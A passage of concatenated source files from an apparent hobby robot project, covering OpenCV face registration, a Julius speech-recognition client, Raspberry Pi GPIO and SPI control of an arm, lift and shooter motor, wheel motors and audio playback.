CV_Error(CV_StsBadArg, error_message);
return;
}
string line, path, classlabel;
while (getline(file, line)) {
stringstream liness(line);
getline(liness, path, separator);
getline(liness, classlabel);
if(!path.empty() && !classlabel.empty()) {
images.push_back(imread(path, 0));
labels.push_back(atoi(classlabel.c_str()));
}
}
}
static void write_csv(const string& filename, vector<string>& paths, int uid) {
std::ofstream writing_file;
writing_file.open(filename, std::ios::app);
if (!writing_file) {
string error_message = "No valid input file was given, please check the given filename.";
CV_Error(CV_StsBadArg, error_message);
return;
}
for (int i = 0; i< paths.size(); i++) {
writing_file << paths[i] << ";" << uid << "\n";
}
writing_file << std::flush;
}
int registerUser(int uid, const char *name){
VideoCapture cap(0);
if(!cap.isOpened()) {
return -1;
}
Mat image;
string csv_file = "/Users/okuokakouhei/java/eclipse/RobotCV/face.csv";
string imagepath = "/Users/okuokakouhei/java/eclipse/RobotCV/images/";
imagepath += name;
    if(mkdir(imagepath.c_str(), 0755)==0){
        printf("Created the image folder.\n");
    }else{
        printf("Failed to create the image folder.\n");
    }
imagepath += "/";
vector<string> paths;
int count = 0;
while(1) {
cap >> image;
string cascade_file = "/usr/local/Cellar/opencv3/3.2.0/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml";
CascadeClassifier cascade;
cascade.load(cascade_file);
vector<Rect> faces;
cascade.detectMultiScale(image, faces, 1.1,3,0,Size(20,20));
        if (faces.empty()) {
            continue; // nothing detected in this frame
        }
        Rect bmax = faces[0];
        for (size_t i = 1; i < faces.size(); i++) {
            if (faces[i].area() > bmax.area()){
                bmax = faces[i]; // keep the largest detected face
            }
        }
cv::Mat roi_img(image, bmax);
rectangle(image, bmax,Scalar(0,200,0),3,CV_AA);
double y = (double)PIX_LEN / bmax.height;
double x = (double)PIX_LEN / bmax.width;
resize(roi_img, roi_img, Size(), x, y, INTER_CUBIC);
imshow("detect face",image);
char key = (char) waitKey(0);
if(key == 27) { //ESC
break;
} else if (key == 32){ //Space
string imgname = imagepath;
imgname += name;
imgname += to_string(count);
imgname += ".jpg";
std::cout << "Print:" << imgname << std::endl;
imwrite(imgname, roi_img);
paths.push_back(imgname);
count++;
} else {
}
}
cv::destroyAllWindows();
if (paths.size() > 0) {
write_csv(csv_file, paths, uid);
}
return 0;
}
int main(int argh, char* argv[]) {
    if (argh != 3) {
        fprintf(stderr, "usage: %s [UID] [name]\n", argv[0]);
        return 1;
    }
registerUser(atoi(argv[1]), argv[2]);
return 0;
}
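// Build sketch (an assumption): the face module comes from opencv_contrib, so
// linking needs something like
//   g++ register_face.cpp -o register_face `pkg-config --cflags --libs opencv` -lopencv_face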
<file_sep>extern int shoot(void); /* declared here; defined in the wiringPi shooter source */
int main(){
    return shoot();
}
<file_sep>import java.io.*;
import java.net.*;
import javax.xml.parsers.*;
import org.w3c.dom.*;
import java.util.*;
class JuliusCliant{
private ICore core_;
public JuliusCliant(ICore core){
core_ = core;
}
public void Run(){
try{
Socket client = new Socket("localhost", 10500);
InputStream input = new DataInputStream(client.getInputStream());
BufferedReader reader = new BufferedReader(new InputStreamReader(input));
PrintStream output = new PrintStream(client.getOutputStream());
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
String s;
StringBuilder sb;
while(true){
sb = new StringBuilder();
sb.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>");
while(true){
                    if((s = reader.readLine()) == null) return; // stream closed by julius: stop instead of spinning
if(s.toString().equals(".")){
String data = sb.toString().replaceAll("<s>", "[s]").replaceAll("</s>", "[/s]");
//System.out.println(data);
InputStream stream = new ByteArrayInputStream(data.getBytes());
Node root = builder.parse(stream);
Node first = root.getFirstChild();
if(first.getNodeName().equals("RECOGOUT")){
NodeList nL = first.getChildNodes();
for(int j = 0; j < nL.getLength(); j++){
Node n = nL.item(j);
if(n.getNodeName().equals("SHYPO")){
StringBuilder sbWord = new StringBuilder();
float cm = 0;
int num = 0;
NodeList wL = n.getChildNodes();
List<JuliusWord> jwl = new ArrayList<JuliusWord>();
for(int k = 0; k < wL.getLength(); k++){
Node w = wL.item(k);
if(w.getNodeName().equals("WHYPO")){
Element el = (Element)w;
if(el.getAttribute("WORD").equals("。")) continue;
if(el.getAttribute("WORD").equals("")) continue;
String word = el.getAttribute("WORD");
String classId = el.getAttribute("CLASSID");
String phone = el.getAttribute("PHONE");
String cmstr = el.getAttribute("CM");
System.out.println("WORD:" + word +" CLASSID: " + classId+" PHONE: "+phone + " CM:"+cmstr);
JuliusWord jw = new JuliusWord(word,phone, classId);
jwl.add(jw);
// sbWord.append(el.getAttribute("WORD"));
// cm += Float.parseFloat(el.getAttribute("CM"));
// num++;
}
}
core_.Order(jwl);
// System.out.println("WORDS:"+num);
// System.out.println(sbWord+":"+cm/num);
}
}
}
System.out.println(first.getNodeName());
break;
}
sb.append(s);
}
System.out.println("\n");
}
//
// output.print("DIE");
// client.close();
}
catch(Exception e){
e.printStackTrace();
}
}
}
<file_sep>#include <wiringPi.h>
#include <stdio.h>
int shoot()
{
int input;
if (wiringPiSetupGpio() == -1)
return 1;
scanf("%d", &input);
if (input == 1) {
pinMode( 04, OUTPUT );
pinMode( 17, OUTPUT );
pinMode(27, OUTPUT);
pinMode(22, OUTPUT);
digitalWrite(04, 1);
digitalWrite( 17, 1 );
digitalWrite(27, 1);
digitalWrite(22, 1);
delay(10000);
digitalWrite(04, 0);
digitalWrite( 17, 0 );
digitalWrite(27, 0);
digitalWrite(22, 0);
}
return 0;
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#include <string.h>
#include <unistd.h>
#define SPI_CHANNEL 0
#define SURVO_OUT 12
#define MOTOR_OUT1 14
#define MOTOR_OUT2 15
#define SS_PORT 8
#define PR_U_CHANNEL 0
#define PR_D_CHANNEL 1
#define PS_CHANNEL 2
#define SLEEP 1000000
#define THRESHOLD_PR 1500
#define RANGE_PR 50
#define TERM_PR 10
#define CLOSE_TRS 980
#define OPEN_TRS 1200
#define RANGE_PS 50
#define TERM_PS 10
int fd_spi; //SPI descripter
int arm_open(){ //Arm open completely. When error, return -1
int a2dVal = 0;
unsigned char data[3];
digitalWrite(SS_PORT, 1);
pwmWrite(SURVO_OUT, 125);
int count = 0;
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PS_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > OPEN_TRS) {
count++;
if (count > TERM_PS) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
pwmWrite(SURVO_OUT, 75);
return 0;
}
int arm_close(){ //Arm catch or close. When error, return -1
int a2dVal = 0, buff = 0;
unsigned char data[3];
digitalWrite(SS_PORT, 1);
pwmWrite(SURVO_OUT, 25);
int count = 0, over = 0;
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PS_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL, data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > CLOSE_TRS) { //Close limit over
over++;
if (over > TERM_PS) {
break;
}
} else {
if (over > 0) {
over--;
}
}
if ((buff - RANGE_PS) < a2dVal && a2dVal < (buff + RANGE_PS)) {//Stop by catching
count++;
if (count > TERM_PS) {
break;
}
} else {
count = 0;
}
buff = a2dVal;
usleep(SLEEP);
}
pwmWrite(SURVO_OUT, 75);
return 0;
}
int arm_fclose(){ //Arm catch or close. When error, return -1
int a2dVal = 0;
unsigned char data[3];
digitalWrite(SS_PORT, 1);
pwmWrite(SURVO_OUT, 25);
int over = 0;
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PS_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL, data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > CLOSE_TRS) { //Close limit over
over++;
if (over > TERM_PS) {
break;
}
} else {
if (over > 0) {
over--;
}
}
usleep(SLEEP);
}
pwmWrite(SURVO_OUT, 75);
return 0;
}
int raise(){ //Lift rises. When error, return -1
int a2dVal = 0;
unsigned char data[3];
digitalWrite(SS_PORT, 1);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
int count = 0;
digitalWrite(MOTOR_OUT2, 1);
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PR_U_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > THRESHOLD_PR) {
count++;
if (count > TERM_PR) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
return 0;
}
int lower(){ //Lift get down. When error, return -1
int a2dVal = 0;
unsigned char data[3];
struct timeval start, end;
digitalWrite(SS_PORT, 1);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
int count = 0;
digitalWrite(MOTOR_OUT1, 1);
gettimeofday(&start, NULL);
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PR_D_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > THRESHOLD_PR) {
count++;
if (count > TERM_PR) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
gettimeofday(&end, NULL);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
if (count > TERM_PR) {
return 0;
}
int sec = end.tv_sec - start.tv_sec;
int time = sec * 1000000 + end.tv_usec;
time -= start.tv_usec;
return time;
}
int lower_t(int clock){ //Lift get down. When error, return -1
int a2dVal = 0;
unsigned char data[3];
struct timeval start, end;
digitalWrite(SS_PORT, 1);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
int count = 0;
digitalWrite(MOTOR_OUT1, 1);
gettimeofday(&start, NULL);
while(1) {
gettimeofday(&end, NULL);
int sec = end.tv_sec - start.tv_sec;
int time = sec * 1000000 + end.tv_usec;
time -= start.tv_usec;
if (time > clock) {
break;
}
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PR_D_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > THRESHOLD_PR) {
count++;
if (count > TERM_PR) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
return 0;
}
void stop(){ //Lift get down. When error, return -1
pwmWrite(SURVO_OUT, 75);
pinMode(MOTOR_OUT1, OUTPUT);
pinMode(MOTOR_OUT2, OUTPUT);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
}
int init() {
if ((fd_spi = wiringPiSPISetup(SPI_CHANNEL, 1000000)) < 0) {
printf("SPISetup failed\n");
return -1;
}
if (wiringPiSetupGpio() == -1) {
fprintf(stderr, "WiringPi Initialize Error\n");
return -1;
}
pinMode(SURVO_OUT,PWM_OUTPUT);
pwmSetMode(PWM_MODE_MS);
pwmSetClock(375);
pwmSetRange(1024);
pinMode(SS_PORT, OUTPUT);
pinMode(MOTOR_OUT1, OUTPUT);
pinMode(MOTOR_OUT2, OUTPUT);
return 0;
}
void quit() {
close(fd_spi);
}
int main(){
char str[512];
    if (init() < 0) {
return -1;
}
while(1) {
memset(str, 0, sizeof(str));
scanf("%s",str);
if (strcmp("o", str) == 0) {
arm_open();
} else if (strcmp("c", str) == 0) {
arm_close();
} else if (strcmp("fc", str) == 0) {
arm_fclose();
} else if (strcmp("r", str) == 0) {
raise();
} else if (strcmp("l", str) == 0) {
lower();
} else {
stop();
}
}
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public class HelloWorld {
public interface CLibrary extends Library {
CLibrary INSTANCE = (CLibrary)
Native.loadLibrary("c" , CLibrary.class);
void printf(String format, Object... args);
}
public static void main(String[] args) {
CLibrary.INSTANCE.printf("Hello, World\n");
}
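    // Run sketch (an assumption, not part of the original file):
    //   javac -cp jna.jar HelloWorld.java
    //   java  -cp jna.jar:. HelloWorld
    // JNA resolves the C library ("c") from the default search path on Linux.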
}<file_sep>extern void g_init();
extern void g_go_straight(int front, unsigned short speed);
extern void g_left_wheel(unsigned short speed);
extern void g_right_wheel(unsigned short speed);
extern void g_turn(int left, unsigned short speed);
extern void g_stop();
extern void g_quit();
<file_sep>#include "move_api.h"
#include "stdio.h"
int main()
{
char c = 0;
g_init();
while(1){
c = getchar();
if(c=='q'){
break;
}else if(c == 's'){
g_stop();
}else if(c == 'f'){
g_go_straight(1,500);
}
}
g_quit();
}
<file_sep>#include <stdlib.h>
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include "esd.h"
#define WAV "/home/pi/tes.wav"
#define BUFFER 4096
static unsigned char tmp[BUFFER];
int main(void)
{
FILE *fp;
int vol, count, len;
int esd;
int sock = -1, rate = ESD_DEFAULT_RATE;
esd_format_t format = 0;
unsigned char *host = NULL;
esd_info_t *esdctl;
format = ESD_BITS16 | ESD_STEREO | ESD_STREAM | ESD_PLAY;
    /* --- open the device --- */
esd = esd_open_sound(host);
fp = fopen(WAV, "r");
sock = esd_play_stream_fallback(format, rate, host, WAV);
esdctl = esd_get_all_info(esd);
    /* --- output loop --- */
while((len = fread(tmp, 1, BUFFER, fp)) > 0) {
write(sock, tmp, len);
}
esd_close(esd);
fclose(fp);
    close(sock);
    return 0;
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#define SPI_CHANNEL 0
#define SS_PORT 8
#define OPEN 1500
#define CLOSE 20
#define RANGE 50
#define TERM 3
int main(int argc, char **argv){
int retCode;
int a2dChannel = 0; // analog channel
int a2dVal = 0;
unsigned char data[3];
    // Start SPI channel 0 at 1 MHz.
if (wiringPiSPISetup(SPI_CHANNEL, 1000000) < 0)
{
printf("SPISetup failed:\n");
return 0;
}
if (wiringPiSetupGpio() == -1) {
printf("GPIO set up error\n");
return 0;
}
pinMode(SS_PORT, OUTPUT);
digitalWrite(SS_PORT, 1);
int count = 0, op_co = 0, cl_co = 0, buff = 0;
while(1) {
data[0] = 0b00000110; // first byte transmitted -> start bit -> (SGL/DIF = 1,D2=0)
data[1] = 0b00000000; // second byte transmitted -> (D1=D0=0)
data[2] = 0; // third byte transmitted....don't care
digitalWrite(SS_PORT, 0);
retCode=wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000; //first 4 bit
a2dVal |= (data[2] & 0xff);
printf("a2dVal=%d\n",a2dVal);
if (a2dVal > OPEN) {
op_co++;
if (op_co > TERM) {
printf("The arm opened completely.\n");
break;
}
cl_co = 0;
count = 0;
} else if (a2dVal < CLOSE) {
cl_co++;
if (cl_co > TERM) {
printf("The arm closed completely.\n");
break;
}
op_co = 0;
count = 0;
        } else if ((buff - RANGE) < a2dVal && a2dVal < (buff + RANGE)) { // reading stable within +/-RANGE of the last sample
count++;
if (count > TERM) {
printf("The arm stopped.\n");
break;
}
op_co = 0;
cl_co = 0;
} else {
op_co = 0;
count = 0;
cl_co = 0;
}
buff = a2dVal;
usleep(10000);
}
}
<file_sep>/*-------------------------------------------------------
OSS - /dev/dsp test
--------------------------------------------------------*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/soundcard.h>
#include <sys/types.h>
#include <sys/stat.h>
#define DSP "/dev/dsp"
#define DIR_PATH "/home/pi/work/robot/RobotPrograms/resources/"
#define BUFFER 2048
#define STR_BUF 512
static unsigned char tmp[BUFFER];
int play(char *filename)
{
int fp, out;
int len, format;
char buf[STR_BUF];
    /* --- build the full path --- */
sprintf(buf,"%s%s",DIR_PATH,filename);
printf("%s\n", buf);
    /* --- open the devices --- */
fp = open(buf, O_RDONLY);
if(fp == -1)printf("error open\n");
out = open(DSP, O_WRONLY);
if(out == -1)printf("error open\n");
    /* --- configure the audio device --- */
format = AFMT_S16_LE;
if(ioctl(out, SNDCTL_DSP_SETFMT, &format)<0)printf("error SNDCTL_DSP_SETFMT\n");
format = 1;
if(ioctl(out, SNDCTL_DSP_STEREO, &format)<0)printf("error SNDCTL_DSP_SPEED\n");
format = 22050/2;
if(ioctl(out, SNDCTL_DSP_SPEED, &format)<0)printf("error SNDCTL_DSP_SPEED\n");
    /* --- output loop --- */
while((len = read(fp, tmp, BUFFER)) > 0) {
write(out, tmp, len);
}
printf("close\n");
close(fp);
close(out);
    return 0;
}
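/* Usage sketch (an assumption): play("Hassha.wav") opens DIR_PATH + "Hassha.wav"
 * and streams it to /dev/dsp; STR_BUF bounds the assembled path, so file names
 * must stay well under 512 bytes. */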
<file_sep>#include <opencv2/core/core.hpp>
#include <opencv2/highgui/highgui.hpp>
#include <opencv2/imgproc/imgproc.hpp>
#include "stdio.h"
using namespace cv;
unsigned char max_intensity = 0;
int target_x = 0;
int target_y = 0;
int main(int, char**)
{
    VideoCapture cap(0); // open the default camera
    if(!cap.isOpened()) // check that it succeeded
return -1;
Mat brightness;
namedWindow("brightness",1);
for(;;)
{
Mat frame;
        cap >> frame; // grab a new frame from the camera
        cv::cvtColor(frame, brightness, CV_BGR2GRAY);
        unsigned char intensity = 0;
        max_intensity = 0; // reset per frame so an old maximum cannot stick
        for( int y = 0; y < brightness.rows; y++ ) {
            for( int x = 0; x < brightness.cols; x++ ) {
                intensity = brightness.at<unsigned char>(y, x); // grayscale value of the pixel at (x, y)
if(intensity <= max_intensity){continue;}
// intensity is more than max_intensity
max_intensity = intensity;
target_x = x;
target_y = y;
}
}
printf("max is %d at %d,%d\n", max_intensity,target_x,target_y);
        // draw a line (image, start point, end point, color, thickness, line type)
line(brightness, Point(brightness.cols / 2, brightness.rows), Point(target_x, target_y), Scalar(0,0,250), 3, 4);
imshow("brightness", brightness);
if(waitKey(30) >= 0) break;
}
    // the camera is released automatically by the VideoCapture destructor
return 0;
}
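// Build sketch (an assumption):
//   g++ brightness.cpp -o brightness `pkg-config --cflags --libs opencv`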
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface PinkyuTester extends Library {
    // The first argument to loadLibrary must match the *** part of the lib***.so built later.
String path = "/home/pi/work/robot/RobotPrograms/libpinkyu1.so";
PinkyuTester INSTANCE = (PinkyuTester) Native.loadLibrary(path, PinkyuTester.class);
    // These must match the C function names.
int main();
int getX();
int getY();
}
<file_sep>
public enum LR{
Left,
Right,
}
<file_sep>#include <stdio.h>
#include <stdlib.h> // chg akihito
#include <unistd.h> /* for read, write, close */
#include <sys/ioctl.h> /* for ioctl */
#include <sys/types.h> /* for open */
#include <sys/stat.h> /* for open */
#include <fcntl.h> /* for open */
#include <signal.h>
#include "driver/urbtc.h" /* Linux specific part */
#include "driver/urobotc.h" /* OS independent part */
#define SPEED 500
#define WHEEL_ZERO 1024
void setup_motor(struct uin *ibuf, struct uout *obuf, struct ccmd *cmd);
void go_straight(struct ccmd *cmd, unsigned short speed, int front);
void left_wheel(struct ccmd *cmd, unsigned short speed);
void right_wheel(struct ccmd *cmd, unsigned short speed);
void turn(struct ccmd *cmd, unsigned short speed, int left);
void stop(struct ccmd *cmd);
int quit_flag = 1;
int fd;
struct uin ibuf;
struct uout obuf;
struct ccmd cmd;
void g_init()
{
setup_motor(&ibuf, &obuf, &cmd);
stop(&cmd);
}
void g_go_straight(int front, unsigned short speed)
{
go_straight(&cmd, speed, front);
}
void g_left_wheel(unsigned short speed)
{
left_wheel(&cmd, speed);
}
void g_right_wheel(unsigned short speed)
{
right_wheel(&cmd, speed);
}
void g_turn(int left, unsigned short speed)
{
turn(&cmd, speed, left);
}
void g_stop()
{
stop(&cmd);
}
void g_quit()
{
stop(&cmd);
close(fd);
}
void setup_motor(struct uin *ibuf, struct uout *obuf, struct ccmd *cmd)
{
int i = 0;
char *dev = "/dev/urbtc0";
if ((fd = open(dev, O_RDWR)) == -1) {
fprintf(stderr, "%s: Open error\n", dev);
exit(1);
}
cmd->retval = 0 /* RETURN_VAL */;
cmd->setoffset = CH0 | CH1 | CH2 | CH3;
cmd->setcounter = CH0 | CH1 | CH2 | CH3;
cmd->resetint = CH0 | CH1 | CH2 | CH3;
cmd->selin = CH0 | CH1 | CH2 | CH3 | SET_SELECT;
#if 0
cmd->dout = DOUT0 | DOUT1 | DOUT2 | DOUT3; /*digital out (ON/OFF out)*/
#endif
cmd->dout = 0;
    cmd->selout = SET_SELECT | CH0 | CH1 | CH2 | CH3; /* unnecessary if the EEPROM data is correct */
    /*--- set the offset value of each channel ---*/
#if __BYTE_ORDER == __LITTLE_ENDIAN
cmd->offset[0] = cmd->offset[1] = cmd->offset[2] = cmd->offset[3] = 0x7fff;
cmd->counter[0] = cmd->counter[1] = cmd->counter[2] = cmd->counter[3] = 0;
cmd->magicno = 0x00;
#else
cmd->offset[0] = cmd->offset[1] = cmd->offset[2] = cmd->offset[3] = 0xff7f;
cmd->counter[0] = cmd->counter[1] = cmd->counter[2] = cmd->counter[3] = 0;
cmd->magicno = 0x00;
#endif
cmd->posneg = SET_POSNEG | CH0 | CH1 | CH2 | CH3;
cmd->breaks = SET_BREAKS | CH0 | CH1 | CH2 | CH3;
cmd->wrrom = 0; /* WR_MAGIC | WR_OFFSET | WR_SELOUT;*/
    /*--- switch to ccmd mode ---*/
    /*--- from then on, the mode is kept until it is switched again ---*/
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
// printf("sizeof(cmd) %d\n", sizeof(cmd));
    /*--- write the ccmd values to the H8 ---*/
    if (write(fd, cmd, sizeof(*cmd)) < 0) { /* cmd is a pointer: write the struct, not the pointer */
fprintf(stderr, "write error\n");
exit(1);
}
#if 0
/*set scmd mode*/
if (ioctl(fd, URBTC_DESIRE_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_DESIRE_SET error\n");
exit(1);
}
#endif
for (i = 0; i < 4; i++) {
#if __BYTE_ORDER == __LITTLE_ENDIAN
obuf->ch[i].x = 0;
obuf->ch[i].d = 0;
obuf->ch[i].kp = 0;
obuf->ch[i].kpx = 1;
obuf->ch[i].kd = 0;
obuf->ch[i].kdx = 1;
obuf->ch[i].ki = 0;
obuf->ch[i].kix = 1;
#else
obuf->ch[i].x = 0;
obuf->ch[i].d = 0;
obuf->ch[i].kp = 0;
obuf->ch[i].kpx = 0x0100;
obuf->ch[i].kd = 0;
obuf->ch[i].kdx = 0x0100;
obuf->ch[i].ki = 0;
obuf->ch[i].kix = 0x0100;
#endif
}
}
void go_straight(struct ccmd *cmd, unsigned short speed, int front)
{
unsigned short a = WHEEL_ZERO;
unsigned short b = WHEEL_ZERO;
if (front) {
a += speed;
b -= speed;
} else {
a -= speed;
b += speed;
}
a <<= 5;
b <<= 5;
cmd->offset[1] = a;
cmd->offset[2] = b;
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0) {
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void left_wheel(struct ccmd *cmd, unsigned short speed)
{
unsigned short a = WHEEL_ZERO;
a += speed;
a <<= 5;
cmd->offset[1] = a;
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0) {
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void right_wheel(struct ccmd *cmd, unsigned short speed)
{
unsigned short a = WHEEL_ZERO;
a += -speed;
a <<= 5;
cmd->offset[2] = a;
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0) {
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void turn(struct ccmd *cmd, unsigned short speed, int left)
{
unsigned short a = WHEEL_ZERO;
unsigned short b = WHEEL_ZERO;
if (left) {
a -= speed;
b -= speed;
} else {
a += speed;
b += speed;
}
a <<= 5;
b <<= 5;
cmd->offset[1] = a;
cmd->offset[2] = b;
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0) {
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void stop(struct ccmd *cmd)
{
unsigned short zero = WHEEL_ZERO;
zero <<= 5;
cmd->offset[1] = zero;
cmd->offset[2] = zero;
write(fd, cmd, sizeof(*cmd));
}
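/* Usage sketch (inferred from obj_cv.cpp later in this repository, which
   drives this API; not documented in this file): call g_init() once, then
   g_go_straight()/g_turn() to move, g_stop() to halt, and g_quit() to
   release /dev/urbtc0. */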
<file_sep>public class ShootApp implements IApplication {
public void Start() {
AudioLib.INSTANCE.play("Hassha.wav");
}
public void Quit() {
ShooterLib.INSTANCE.stop_moter();
}
public void Update() {
return;
}
public int Cleanup() {
return 0;
}
public void Order(String word) {
System.out.println(word);
if (word.equals("uchikorose"))
ShooterLib.INSTANCE.start_moter();
}
public boolean IsRunning(){
return true;
}
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface AudioLib extends Library {
String path = "/home/pi/work/robot/RobotPrograms/libaudio_api.so";
AudioLib INSTANCE = (AudioLib) Native.loadLibrary(path, AudioLib.class);
// must match the C function names
void play(String filename);
}
<file_sep>#include <wiringPi.h>
#include <stdio.h>
void start_moter()
{
if (wiringPiSetupGpio() == -1)
return;
pinMode( 04, OUTPUT );
digitalWrite(04, 1);
}
void stop_moter()
{
/* assumes start_moter() has already run wiringPiSetupGpio() */
digitalWrite(04, 0);
}
<file_sep>#include <stdio.h>
#include <stdlib.h> // chg akihito
#include <unistd.h> /* for read, write, close */
#include <sys/ioctl.h> /* for ioctl */
#include <sys/types.h> /* for open */
#include <sys/stat.h> /* for open */
#include <fcntl.h> /* for open */
#include <signal.h>
#include "driver/urbtc.h" /* Linux specific part */
#include "driver/urobotc.h" /* OS independent part */
#define SPEED 500
#define WHEEL_ZERO 1024
void exit_program(int sig);
void setup_motor(struct uin *ibuf,struct uout *obuf,struct ccmd *cmd);
void go_straight(struct ccmd *cmd, unsigned short speed, int front);
void turn(struct ccmd *cmd, unsigned short speed, int left);
void stop(struct ccmd *cmd);
int quit_flag = 1;
int fd;
int main(int argc, char **argv)
{
struct uin ibuf;
struct uout obuf;
struct ccmd cmd;
int i;
setup_motor(&ibuf, &obuf, &cmd);
stop(&cmd);
i = 0;
while(quit_flag) {
char c = 0;
c = getchar();
switch(c){
case 'f':
go_straight(&cmd, SPEED, 1);
printf("GO FRONT\n");
break;
case 'b':
go_straight(&cmd, SPEED, 0);
printf("GO BACK\n");
break;
case 'l':
turn(&cmd, SPEED, 1);
printf("TURN LEFT\n");
break;
case 'r':
turn(&cmd, SPEED, 0);
printf("TURN RIGHT\n");
break;
}
}
stop(&cmd);
close(fd);
return 0;
}
void setup_motor(struct uin *ibuf,struct uout *obuf,struct ccmd *cmd)
{
int i = 0;
char *dev = "/dev/urbtc0";
signal(SIGINT, exit_program);
if ((fd = open(dev, O_RDWR)) == -1) {
fprintf(stderr, "%s: Open error\n", dev);
exit(1);
}
cmd->retval = 0 /* RETURN_VAL */;
cmd->setoffset = CH0 | CH1 | CH2 | CH3;
cmd->setcounter = CH0 | CH1 | CH2 | CH3;
cmd->resetint = CH0 | CH1 | CH2 | CH3;
cmd->selin = CH0 | CH1 | CH2 | CH3 | SET_SELECT;
#if 0
cmd->dout = DOUT0 | DOUT1 | DOUT2 | DOUT3; /*digital out (ON/OFF out)*/
#endif
cmd->dout = 0;
cmd->selout = SET_SELECT | CH0 | CH1 | CH2 | CH3; /* not needed if the EEPROM data is correct */
/*--- set the offset value for each channel ---*/
#if __BYTE_ORDER == __LITTLE_ENDIAN
cmd->offset[0] = cmd->offset[1] = cmd->offset[2] = cmd->offset[3] = 0x7fff;
cmd->counter[0] = cmd->counter[1] = cmd->counter[2] = cmd->counter[3] = 0;
cmd->magicno = 0x00;
#else
cmd->offset[0] = cmd->offset[1] = cmd->offset[2] = cmd->offset[3] = 0xff7f;
